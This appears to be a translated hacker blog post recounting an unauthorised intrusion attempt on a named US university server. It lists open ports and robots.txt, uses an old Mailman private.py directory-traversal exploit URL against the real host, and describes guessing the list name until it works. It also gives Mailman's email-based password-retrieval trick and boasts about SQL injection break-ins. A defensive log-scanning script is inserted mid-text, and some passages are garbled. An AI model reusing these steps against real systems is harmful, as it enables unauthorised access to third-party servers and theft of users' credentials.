Brief introduction to a foreign university website

Source: Internet
Author: User

This time I will talk about a port.

Many people think that X-Scan is outdated, and almost no one uses it any more. With the rise of so-called hackers, attacking a foreign website now means brute-forcing it with tools rather than actually hacking it. There is no technical content at all, which is really disheartening.

A few days ago, tank asked me how PHP manual injection statements could be so simple. Being simple does not mean there is nothing to it. In China, almost every website with an injection point has already been intruded, but the means were tools or a flood of 0days. Let's look at a real case instead. This evening I came across an ASP website with an injection point. However, scanning it with tools got nowhere. I just want to say: I look down on that. In this case I used old-fashioned manual ASP injection with a combined query, and the password came out in about 20 minutes.

Got in. The website is clean and has never been intruded before...... Helpless.

To be honest, this manual ASP combined-query injection is not difficult. Three URLs end the battle.

Let's get back to the topic.

Tonight Tom and I are working on a US .edu site:

ne.oregonstate.edu

I did a simple scan of the server and found these ports open:

Www: 1, 443

Www: 1, 8000

Ftp: 21

Www: 80

Ssh: 22

I was curious about port 443 being listed under the www protocol:

http://ne.oregonstate.edu:443 returns an error...... Dizzy. Of course, it is https.

https://ne.oregonstate.edu shows the interface.

Open https://ne.oregonstate.edu/robots.txt and you see this:

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/
Disallow: /*?
Disallow: /*/resources/
Disallow: /classes/eecs/fall2009/cs515/

Accessing the administrator directory fails. Apparently, judging from the first screenshot, this is a new SSL website.

Okay, I finally opened X-Scan (http://www.heibai.net/download/Soft/Soft_3870.htm), scanned, and it reported a vulnerability: Mailman.

Many people do not like X-Scan because it is detection software rather than intrusion software. In fact, this kind of software goes deeper and is rarer than intrusion tools; it teaches you to analyze, so that you don't get lost in tools and end up a real fool.

The detection report says this:

Mailman private.py directory traversal vulnerability

The target host runs the Mailman mail list service.

Its cgi/private.py has a directory traversal vulnerability. The vulnerability occurs when the web server does not filter extra slashes in the URL, as with Apache 1.3.x. With a specially crafted web request, a user on the list can read arbitrary files on the host with the web service's permissions, including the email addresses and passwords of any users stored on the host.

*** Nessus determined that this host is vulnerable solely by looking at the Mailman version number installed on the host. ***

See http://lists.netsys.com/pipermail/full-disclosure/2005-February/031562.html

Solution: Update to Mailman 2.1.6 as soon as possible, or fix it according to the description at the above URL.

Risk Level: high

X-Scan's Chinese report gives no test URL. The actual test URL is:

http://$target/mailman/private/$listname/.../...///mailman?username=$user&password=$pass
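As a defensive counterpart to the test URL above, here is an added example (not from the original post, and not Mailman's or Nessus's code) that scans web-server access logs for requests to /mailman/private/ containing the dot-only or empty path segments that Apache 1.3.x passed through to private.py; it also decodes %2F, so percent-encoded variants are caught, which goes beyond the literal URL on the page. The log lines, IP address and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (Common Log Format); the IP and
# timestamps are made up and are not from the page's target.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2005:04:52:01 -0800] "GET /mailman/listinfo/mailman HTTP/1.1" 200 5120
203.0.113.5 - - [10/Feb/2005:04:52:09 -0800] "GET /mailman/private/mailman/ HTTP/1.1" 200 3210
203.0.113.5 - - [10/Feb/2005:04:53:44 -0800] "GET /mailman/private/mailman/.../...///mailman?username=x&password=y HTTP/1.1" 200 8820
203.0.113.5 - - [10/Feb/2005:04:54:02 -0800] "GET /mailman/private/admin/..%2F..%2Fmailman HTTP/1.1" 404 210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
PRIVATE_PREFIX = "/mailman/private/"


def suspicious_segments(path: str) -> list:
    """Return path segments under /mailman/private/ that look like traversal tricks.

    Apache 1.3.x handed runs of slashes and dot-only segments to private.py
    unchanged, so an empty segment (from //) or a segment made only of dots
    (.., ..., ....) is the signature of the private.py traversal request.
    """
    decoded = unquote(path)  # also catches %2F / %2E encoded variants
    if not decoded.lower().startswith(PRIVATE_PREFIX):
        return []
    rest = decoded[len(PRIVATE_PREFIX):]
    if rest.endswith("/"):  # one trailing slash is normal for a list URL
        rest = rest[:-1]
    return [s for s in rest.split("/") if s == "" or re.fullmatch(r"\.{2,}", s)]


def scan_log(text: str) -> list:
    """Parse CLF lines and return (ip, request target, flagged segments) per hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m.group("target")).path  # drop the query string
        bad = suspicious_segments(path)
        if bad:
            hits.append((m.group("ip"), m.group("target"), bad))
    return hits


if __name__ == "__main__":
    for ip, target, bad in scan_log(SAMPLE_LOG):
        print(f"{ip} {target} -> suspicious segments {bad}")
```

A hit on a 200 response is the one to investigate first; a 404 still shows someone probing the path.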

The actual website is

https://ne.oregonstate.edu/mailman/private/$listname/.../...///mailman?username=$user&password=$pass

However, it returns a list error.

Next comes guessing the mailing list name, which is just like guessing table names in injection.

https://ne.oregonstate.edu/mailman/private/$listname/.../...///mailman?username=$user&password=$pass

Replace $listname with the list name. I guessed admin, root and newlist for a long time without success. Then I checked how Mailman is configured:

1. Install the mailing list program:

apt-get install mailman

2. Edit /etc/mailman/mm_cfg.py (this server uses Exim4 as its mail service):

DEFAULT_EMAIL_HOST = 'lists.mydomain.com'

DEFAULT_URL_HOST = 'www.mydomain.com'

MTA = None

3. Create the default mailing list:

newlist mailman

The default list is called mailman. Try mailman:

https://ne.oregonstate.edu/mailman/private/mailman/.../...///mailman?username=$user&password=$pass

It actually worked...... Depressing......

Next, $user and $pass in the URL are replaced with any existing user name and password.

Attackers can use web Service Permissions to obtain arbitrary files on the host, including the email addresses and passwords of any users stored on the host.

As for the "retrieve password" function and the database XX in the back end, you can work that out yourself.

However, guessing the password does not seem hard, although I have not succeeded yet. It is five o'clock in the morning; I cannot go on.

Mailman password retrieval

The version of the Mailman mailing list software running on this host allows a list member to retrieve the passwords of any other member by sending specially crafted mail to the server.

Send a message to $listname-request@target containing the following lines:

password address=$victim
password address=$subscriber

The passwords of $victim and $subscriber on the $listname list are returned.

Note: Nessus determined this only by looking at the Mailman version number installed on the target machine.

$listname has already been guessed......

I admit that all of this builds on other people's work. But it is still better than being called a lousy injection attack. What else should we do? At least I think it is very practical for training people's penetration and analysis skills.

And isn't its technical content still better than those articles that do nothing but inject ASP websites all day long?
